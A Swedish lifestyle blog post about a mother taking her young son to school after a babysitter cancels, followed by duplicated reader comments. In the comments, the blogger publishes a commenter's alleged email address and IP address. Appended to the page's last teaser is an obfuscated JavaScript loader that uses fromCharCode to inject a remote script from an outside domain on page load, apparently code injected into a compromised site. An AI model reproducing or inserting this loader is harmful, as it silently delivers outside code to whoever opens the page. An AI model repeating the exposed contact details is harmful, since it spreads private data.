Ibland blir det inte riktigt som planerat….

Godmorgon fina!

Ibland blir det inte riktigt som planerat. Då får man tänka om och göra det bästa av situationen.

Klockan är nu strax innan 06:00. Jag Står i panik och försöker att göra lunch och matlådor. Till mig själv hade jag redan gjort det, men nu ska jag även göra till Lilleman som får följa med till skola idag. barnvakten har blivit sjuk. Jag vaknade och såg ett sms som kommit runt midnatt inatt, när jag själv sov sedan länge…. PANIIIIK!!!!!!!! Hmm, vad ska jag göra, HUR löser jag detta! 

Det finns inga alternativ. Jag har slängt paddan på laddning, plockat fram frukt, fika och kokat makaroner och stekt köttbullar. Ont, om tid nu på morgonen. Ludvig kommer tycka att det är hur roligt som helst. Det finns studsmattor, soffor, ett hel gym att busa på.

MEN, jag är nervös. Du vet inte störa andra elever, osv. Jag ger det ett försök. Går det inte så går det inte… då får jag ta med honom och åka hem. Det är mycket praktiskt idag, så det borde gå. Vi går se..

Det har verkligen gått ”troll” i hela min veckoplanerimg denna veckan! SUCK! MEN , nu gör jag det bästa av situationen. Ska väcka hono, strax och berätta att det blir skola snar. Han kan sova en halvtimme till innan jag behöver göra det..BIldbomb ifrån igår. Maxpulstest på cykel. 

 

 

IMG_1038 IMG_1036 IMG_0996

 

Rasmus var den sista att kliva av cykeln! -Snyygt! Gud vad svårt det var, jag fick mjölkstrå i benen innan andningen stoppade mig. Detta  var som ett ”studiebesök” i maxpulstest. Jag skulle kunna tänka mig att göra det ett par gånger för att verkligen se..

Sen har vi det härliga ”grabb gänget” som är livrädda för att vad kondition och cardio heter, hehe! Dom valde ätts tå brevid och heja på 😉 

IMG_1052

Men kram-goa är dom iallafall.. hehe! Vi hörs sen! Jag måste försaka plocka ihop en väska ”bra att ha grejer” ritblock, pusselbok osv… Vi hörs senare! Kram

/ My Martens

 

65 Komentarer

 1. Att kräva 100% närvaro låter helt orimligt i mina öron! VEM klarar det under ett helt år??
  säg att du får influensan, då är du ju liggande 1-2 veckor?
  Fy vilken press…

 2. Tror det kommer gå jättebra. Du studerar till ett serviceyrke och i det kan det hända att det kommer en kund med ett barn med sig. Alla kommer att lära sig något av att Lilleman med. Kram. Ni är ett fint team du och din son. ?

 3. Att kräva 100% närvaro låter helt orimligt i mina öron! VEM klarar det under ett helt år??
  säg att du får influensan, då är du ju liggande 1-2 veckor?
  Fy vilken press…

 4. Tror det kommer gå jättebra. Du studerar till ett serviceyrke och i det kan det hända att det kommer en kund med ett barn med sig. Alla kommer att lära sig något av att Lilleman med. Kram. Ni är ett fint team du och din son. 💙

 5. Tur din son verkar klara av så mkt förändringar med dagis/dagmamma/ barnvakter etc. Men trist för honom när han är hos dig. Kanske inte så klokt med det att vara de veckor han är hos dig, men förstår ditt dilemma.
  Din utbildning verkar inte ta hänsyn till nåt personligt. Förstår att du gillar den men visst borde din son gå i första hand?
  När är utbildningen klar ? Kanske kan du bromsa ner lite då. En sak till jag funderat lite på, när din son blir sex år, hur gör ni med hans skolgång då, man får ju inte gå i skolan på olika skolor varannan vecka. Hur löser ni det? Fast jag kanske inte ska lägga mig i, men undrar bara hur ni föräldrar tänker lösa det-
  Ha en fin söndag, trots ”skolan”. Kram

 6. Tur din son verkar klara av så mkt förändringar med dagis/dagmamma/ barnvakter etc. Men trist för honom när han är hos dig. Kanske inte så klokt med det att vara de veckor han är hos dig, men förstår ditt dilemma.
  Din utbildning verkar inte ta hänsyn till nåt personligt. Förstår att du gillar den men visst borde din son gå i första hand?
  När är utbildningen klar ? Kanske kan du bromsa ner lite då. En sak till jag funderat lite på, när din son blir sex år, hur gör ni med hans skolgång då, man får ju inte gå i skolan på olika skolor varannan vecka. Hur löser ni det? Fast jag kanske inte ska lägga mig i, men undrar bara hur ni föräldrar tänker lösa det-

  Ha en fin söndag, trots ”skolan”. Kram

  • Förstår inte heller hur du hinner det en sådan här morgon, det viktigaste är din son och du My låt bloggen vänta när det är för mycket. Hoppas allt har gått bra idag för er båda.

   • Tack =) Jag väntade på att ägga skulle bli klara, att kaffet skulle rinna ner. Jag lät Ludvig sova så länge som möjligt. jag själv var ombytt, med skorna på och väntade. Jag fick ca 12 min ”över” dom la jag på er, och på bloggen…. =)

 7. Vilken otur du har denna veckan. Hur länge varar din utbildning (menar veckor eller månader) ? Hoppas att du får bättre flyt nästa vecka 😄

  • Förstår inte heller hur du hinner det en sådan här morgon, det viktigaste är din son och du My låt bloggen vänta när det är för mycket. Hoppas allt har gått bra idag för er båda.

   • Tack =) Jag väntade på att ägga skulle bli klara, att kaffet skulle rinna ner. Jag lät Ludvig sova så länge som möjligt. jag själv var ombytt, med skorna på och väntade. Jag fick ca 12 min ”över” dom la jag på er, och på bloggen…. =)

 8. Får man fråga ett par saker utan att du tar illa upp? För jag menar inget illa, är mest nyfiken.
  Hur lång är utbildningen och varför gör ni helger?
  Tycker inte det är konstigt om du har barnvakt till sonen men jag undrar om hans situation när han är hos pappan? Är det förskola/dagis då? För du har förskola/dagis och barnvakt därutöver ?
  Har dina läsare minskat i antal sen du började skriva om utbildningen ?
  Sen undrar jag om du fick näringsförbud i samband med din konkurs eller är det ”fritt fram” för dig starta nytt företag om du skulle vilja ?

  • Hej!OJ, många frågor på samma gång… nästan som ett förhör ? jag ska försöka beta ev dom en efter en. Ingen ond ton eller ”illa vid mig ton” Från min sida. utbildningen kan du läsa mer om påhttp://www.safe-education.se då det finns HUUUUR många som helst upplägg och sätt att ta sig igenom dessa olika val av utbildningar. Det anpassas också ganska individuellt och man har själv möjlighet att planera en hel del. Skolan är även på helger. Obligatorisk närvaro.
   Hur menar du gällande hans tid hos sin pappa? Ja, han har dagmamma där, samma som jag skolade in honom hos. Hans pappa är också egen företagare och jobbar mycket. Ingen av oss är förädlalediga, så självklart har vi barnomsorg, precis som alla andra.
   -Är det konstigt? Vad är frågan? ”situation hos sin pappa”? Jag har dagis, ja. Just nu, denna helgen så är det första gången som jag har barnvakt. DVS UTANFÖR dagis, men med barnvaks resurser genom dagis. Så fick det bli pga av divers olika situationer.
   Skolan är intensiv, anrättande och jag uppoffrar en hel del. Skolan är en del av det sök ingår i mitt vägval, min väg där jag bygger upp det liv som jag vill skapa för mig och Lilleman.
   Hitils har jag på ett, mirakulöst sett har jag lyckats parera det utan att det inkräktat på mina barnhelger och veckor för utom dagis tiden. Fler mammor går i samma skola, dom har en man som ”passar” barnen under tiden.
   Men denna helgen föll min planering, av flera anledningar. Sånt händer ibland. Skulle detta på något sätt vara något negativt?
   Kan jag ställa frågor utan att du tar illa upp? Vad är det som får dig att ställa dessa frågor? Vart vill du komma med dom? Kan du relatera till min situation, eller är du bara nyfiken?
   Om mina läsare minskat i antal pga av skolan? Både ja och nej, jag minskar mina inlägg när jag är i skolan. Prioriterar Lilleman, skolan och bloggen. I följdordning. Antalet, nej. Många nya hälsa och tränings intresserade läsare har däremot kommit till. Och då äntligen till sista frågan. nej, jag är inte dömd till någonting och har INTE fått näringsförbud. Jag är aktiv i ett AB och jobbar med det ca 100% idag ? Så nej, inget näringsförbud här…. =) Kram

   • Tack för ditt svar. Och ja, jag skrev ju att jag var nyfiken. Inget ont i att du har barnvakt utan min fråga om skolans tider var om ni går sju dar i veckan. Tycker ett upplägg med helger lediga vore bättre då det väl är fler som har barn och alla är vuxna människor. Att det sen kanske inte är praktiskt möjligt är en annan sak. Att jag frågade om bloggen ”minskat” beror bara på att många gillar inte för långa inlägg. Men mycket bilder ska det vara och det har du ju.
    Jag dyker upp än här än där med både frågor, tankar och ibland motsatta åsikter men du får aldrig aldrig uppfatta mig som ond eller elak för det är jag inte. Kram tillbaka

 9. Men MY!! Guud vilken förvandling du har gjort och även ditt liv och din blogg tagit till det positiva ? Jag är säker på att det gick bra i dag och gjorde det inte det så har ni lärt er ännu en sak. Ett av mina favorit ordspråk är: ”Some times you win some times you learn” Nu har du lärt dig massor under en lång period så nu är det dags att vinna för dig ?

 10. Vilket skitliv du lever. Att du satsat på fel saker framgår hela tiden. Djur och barn känner stress, var du än säger eller intalar dig. Tänker du någonsin på annat än dig själv? Allt i din blogg utstrålar kaos, panik, stress, nödlösningar, oharmoni, tårar och så vidare. Hur kan du låta detta fortsätta? Ren och skär egoism från din sida. Du gör dåliga val hela tiden.

  • Hej! ”Karin” Här är bara några av alla dina kommentarer. MED OLIKA NAMN, men samma IP NR!
   Lite obehagligt att du byter namn? och att du ALLTID förföljer mig med dina negativa och rent av elaka kommentarer. Oftast utan substans och heller aldrig baserat på fakta, men ändå…. Med dina namnändringar m.m så upplever jag att du kanske är schizofren? Oavsett vad så är det ändå ingen ursäkt för att trakassera, förtala och hota människor. Sök hjälp, professionell hjälp! Lämna mig ifred och ta detta som en artig varning innan polisanmälning! / My
   Pernilla
   penillaolje@spray.se
   81.230.145.57
   Postat 2016-08-13 kl. 21:17
   Så oansvarigt av dig att skaffa en liten kattunge som ska vara ensam hela långa dagarna då du är i skolan. Mogna någon gång!
   Ludvig ska få syskon, jag kompenserar med Sture! <3
   Visa inlägg
   58
   58 kommentarer
   No
   Välj kommentar Pernilla
   pernillaolje@spray.se
   81.230.145.57
   Postat 2016-08-02 kl. 13:43 | Som svar till My.
   Men nu ljuger du allt My, och talar emot vad du tidigare skrivit i bloggen… Den 25 juni skrev du:
   ”Och vet du vad. Inga sömntabletter. drack något glas bubbel till middagen och ett glas rosè på bryggan”
   Dags att stå sitt kast, krypa till korset och be om ursäkt….. -Förlåt!
   Visa inlägg
   46
   46 kommentarer
   No
   Välj kommentar Pernilla
   penillaolje@spray.se
   81.230.145.57
   Postat 2016-07-18 kl. 23:47
   Du säger hela tiden att du driver en så ärlig och öppen blogg. Så varför inte berätta för oss läsare vad det kommer sig att så många av dina bloggkompisar vänt dig ryggen. Ett ärligt svar vore välkommet.

   • Kära My. Kan inte svara för andra namn. Karin är mitt. Har en VPN tunnel. Inget konstigt alls. Lycka till med polisanmälan. Förstår att du har svårt att ta kritik/goda råd. Tråkigt bara att det är Ludvig och dina djur som drabbas av fin tjurskallighet. Du visar verkligen hur omogen du är egentligen. Lycka till!

    • Sist hette du Pernilla, (Eenligt dig själv) gången innan det Eva.. Vad heter du imorgon? Vad heter du nästa vecka? Obehagligt är vad jag tycker att det är. Bort från mig, min blogg och mitt liv! PUNKT.

     • Hej igen ”Karin” ”Eva” ”Pernilla” ”Lotta” Ditt IP-nr från din VPN blockeras nu, och du kommer numera inte att kunna kommentera här inne mer……. Sista varningen innan polisanmälan! / My

    • Men snälla nån, Karin eller vad du nu heter eller i vilken tunnel du nu befinner dig. Ska det vara så JÄVLA svårt att sluta följa My. Det är ju liksom frivilligt. Men du kanske mår bra av att svara henne som du gör. Jag tror mest du är ett troll, en riktig fegis, kanhända ditt riktiga namn kommer fram till slut.
     My, du vet ju att stalking är ett brott, anmäl innan det går för långt.
     Kram och ha en fin dag med lilleman.

   • varför hänga ut folk på detta viset tycker att det känns obehagligt ! Ta det med henne personligen istället!du har ju sagt själv att du inte hänger ut folk…

    • Jag hänger inte ut någon det är ju en VPN på, som hon skriver! Googla VPN så förstår du….. så nja, lite missvisande kommentar från din sida. Men du förstod nog bara inte. Denna ”profilen” gömmer sig bakom VPN. JAG, kan inte se vem ”profilen” är, DU kan inte se vem profilen är. INGEN kan se vem profilen är. Det är just därför som ”profilen” vågar, trakassera, hota, och fördölja mig genom bloggen….. -Är du med? =)

 11. Ta inte åt dig My från dessa troll. Du är en fantastisk tjej med ett jäklar anamma och enormt driv. Tro på dig själv och låt inte några avundsjuka bittra människor trycka ner. Snygga och duktiga tjejer är ett hot för vissa.
  Kram till dig och lilleman?

 12. Får man fråga ett par saker utan att du tar illa upp? För jag menar inget illa, är mest nyfiken.
  Hur lång är utbildningen och varför gör ni helger?
  Tycker inte det är konstigt om du har barnvakt till sonen men jag undrar om hans situation när han är hos pappan? Är det förskola/dagis då? För du har förskola/dagis och barnvakt därutöver ?
  Har dina läsare minskat i antal sen du började skriva om utbildningen ?
  Sen undrar jag om du fick näringsförbud i samband med din konkurs eller är det ”fritt fram” för dig starta nytt företag om du skulle vilja ?

  • Hej!OJ, många frågor på samma gång… nästan som ett förhör 😉 jag ska försöka beta ev dom en efter en. Ingen ond ton eller ”illa vid mig ton” Från min sida. utbildningen kan du läsa mer om påhttps://www.safe-education.se då det finns HUUUUR många som helst upplägg och sätt att ta sig igenom dessa olika val av utbildningar. Det anpassas också ganska individuellt och man har själv möjlighet att planera en hel del. Skolan är även på helger. Obligatorisk närvaro.

   Hur menar du gällande hans tid hos sin pappa? Ja, han har dagmamma där, samma som jag skolade in honom hos. Hans pappa är också egen företagare och jobbar mycket. Ingen av oss är förädlalediga, så självklart har vi barnomsorg, precis som alla andra.

   -Är det konstigt? Vad är frågan? ”situation hos sin pappa”? Jag har dagis, ja. Just nu, denna helgen så är det första gången som jag har barnvakt. DVS UTANFÖR dagis, men med barnvaks resurser genom dagis. Så fick det bli pga av divers olika situationer.

   Skolan är intensiv, anrättande och jag uppoffrar en hel del. Skolan är en del av det sök ingår i mitt vägval, min väg där jag bygger upp det liv som jag vill skapa för mig och Lilleman.

   Hitils har jag på ett, mirakulöst sett har jag lyckats parera det utan att det inkräktat på mina barnhelger och veckor för utom dagis tiden. Fler mammor går i samma skola, dom har en man som ”passar” barnen under tiden.

   Men denna helgen föll min planering, av flera anledningar. Sånt händer ibland. Skulle detta på något sätt vara något negativt?

   Kan jag ställa frågor utan att du tar illa upp? Vad är det som får dig att ställa dessa frågor? Vart vill du komma med dom? Kan du relatera till min situation, eller är du bara nyfiken?

   Om mina läsare minskat i antal pga av skolan? Både ja och nej, jag minskar mina inlägg när jag är i skolan. Prioriterar Lilleman, skolan och bloggen. I följdordning. Antalet, nej. Många nya hälsa och tränings intresserade läsare har däremot kommit till. Och då äntligen till sista frågan. nej, jag är inte dömd till någonting och har INTE fått näringsförbud. Jag är aktiv i ett AB och jobbar med det ca 100% idag 😉 Så nej, inget näringsförbud här…. =) Kram

   • Tack för ditt svar. Och ja, jag skrev ju att jag var nyfiken. Inget ont i att du har barnvakt utan min fråga om skolans tider var om ni går sju dar i veckan. Tycker ett upplägg med helger lediga vore bättre då det väl är fler som har barn och alla är vuxna människor. Att det sen kanske inte är praktiskt möjligt är en annan sak. Att jag frågade om bloggen ”minskat” beror bara på att många gillar inte för långa inlägg. Men mycket bilder ska det vara och det har du ju.
    Jag dyker upp än här än där med både frågor, tankar och ibland motsatta åsikter men du får aldrig aldrig uppfatta mig som ond eller elak för det är jag inte. Kram tillbaka

 13. Men MY!! Guud vilken förvandling du har gjort och även ditt liv och din blogg tagit till det positiva 🙂 Jag är säker på att det gick bra i dag och gjorde det inte det så har ni lärt er ännu en sak. Ett av mina favorit ordspråk är: ”Some times you win some times you learn” Nu har du lärt dig massor under en lång period så nu är det dags att vinna för dig 😀

 14. Vilket skitliv du lever. Att du satsat på fel saker framgår hela tiden. Djur och barn känner stress, var du än säger eller intalar dig. Tänker du någonsin på annat än dig själv? Allt i din blogg utstrålar kaos, panik, stress, nödlösningar, oharmoni, tårar och så vidare. Hur kan du låta detta fortsätta? Ren och skär egoism från din sida. Du gör dåliga val hela tiden.

  • Hej! ”Karin” Här är bara några av alla dina kommentarer. MED OLIKA NAMN, men samma IP NR!

   Lite obehagligt att du byter namn? och att du ALLTID förföljer mig med dina negativa och rent av elaka kommentarer. Oftast utan substans och heller aldrig baserat på fakta, men ändå…. Med dina namnändringar m.m så upplever jag att du kanske är schizofren? Oavsett vad så är det ändå ingen ursäkt för att trakassera, förtala och hota människor. Sök hjälp, professionell hjälp! Lämna mig ifred och ta detta som en artig varning innan polisanmälning! / My

   Pernilla
   penillaolje@spray.se
   81.230.145.57
   Postat 2016-08-13 kl. 21:17
   Så oansvarigt av dig att skaffa en liten kattunge som ska vara ensam hela långa dagarna då du är i skolan. Mogna någon gång!

   Ludvig ska få syskon, jag kompenserar med Sture! <3
   Visa inlägg
   58
   58 kommentarer
   No
   Välj kommentar Pernilla
   pernillaolje@spray.se
   81.230.145.57
   Postat 2016-08-02 kl. 13:43 | Som svar till My.
   Men nu ljuger du allt My, och talar emot vad du tidigare skrivit i bloggen… Den 25 juni skrev du:

   ”Och vet du vad. Inga sömntabletter. drack något glas bubbel till middagen och ett glas rosè på bryggan”

   Dags att stå sitt kast, krypa till korset och be om ursäkt….. -Förlåt!
   Visa inlägg
   46
   46 kommentarer
   No
   Välj kommentar Pernilla
   penillaolje@spray.se
   81.230.145.57
   Postat 2016-07-18 kl. 23:47
   Du säger hela tiden att du driver en så ärlig och öppen blogg. Så varför inte berätta för oss läsare vad det kommer sig att så många av dina bloggkompisar vänt dig ryggen. Ett ärligt svar vore välkommet.

   • Kära My. Kan inte svara för andra namn. Karin är mitt. Har en VPN tunnel. Inget konstigt alls. Lycka till med polisanmälan. Förstår att du har svårt att ta kritik/goda råd. Tråkigt bara att det är Ludvig och dina djur som drabbas av fin tjurskallighet. Du visar verkligen hur omogen du är egentligen. Lycka till!

    • Sist hette du Pernilla, (Eenligt dig själv) gången innan det Eva.. Vad heter du imorgon? Vad heter du nästa vecka? Obehagligt är vad jag tycker att det är. Bort från mig, min blogg och mitt liv! PUNKT.

     • Hej igen ”Karin” ”Eva” ”Pernilla” ”Lotta” Ditt IP-nr från din VPN blockeras nu, och du kommer numera inte att kunna kommentera här inne mer……. Sista varningen innan polisanmälan! / My

    • Men snälla nån, Karin eller vad du nu heter eller i vilken tunnel du nu befinner dig. Ska det vara så JÄVLA svårt att sluta följa My. Det är ju liksom frivilligt. Men du kanske mår bra av att svara henne som du gör. Jag tror mest du är ett troll, en riktig fegis, kanhända ditt riktiga namn kommer fram till slut.
     My, du vet ju att stalking är ett brott, anmäl innan det går för långt.
     Kram och ha en fin dag med lilleman.

   • varför hänga ut folk på detta viset tycker att det känns obehagligt ! Ta det med henne personligen istället!du har ju sagt själv att du inte hänger ut folk…

    • Jag hänger inte ut någon det är ju en VPN på, som hon skriver! Googla VPN så förstår du….. så nja, lite missvisande kommentar från din sida. Men du förstod nog bara inte. Denna ”profilen” gömmer sig bakom VPN. JAG, kan inte se vem ”profilen” är, DU kan inte se vem profilen är. INGEN kan se vem profilen är. Det är just därför som ”profilen” vågar, trakassera, hota, och fördölja mig genom bloggen….. -Är du med? =)

 15. Ta inte åt dig My från dessa troll. Du är en fantastisk tjej med ett jäklar anamma och enormt driv. Tro på dig själv och låt inte några avundsjuka bittra människor trycka ner. Snygga och duktiga tjejer är ett hot för vissa.
  Kram till dig och lilleman😙

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/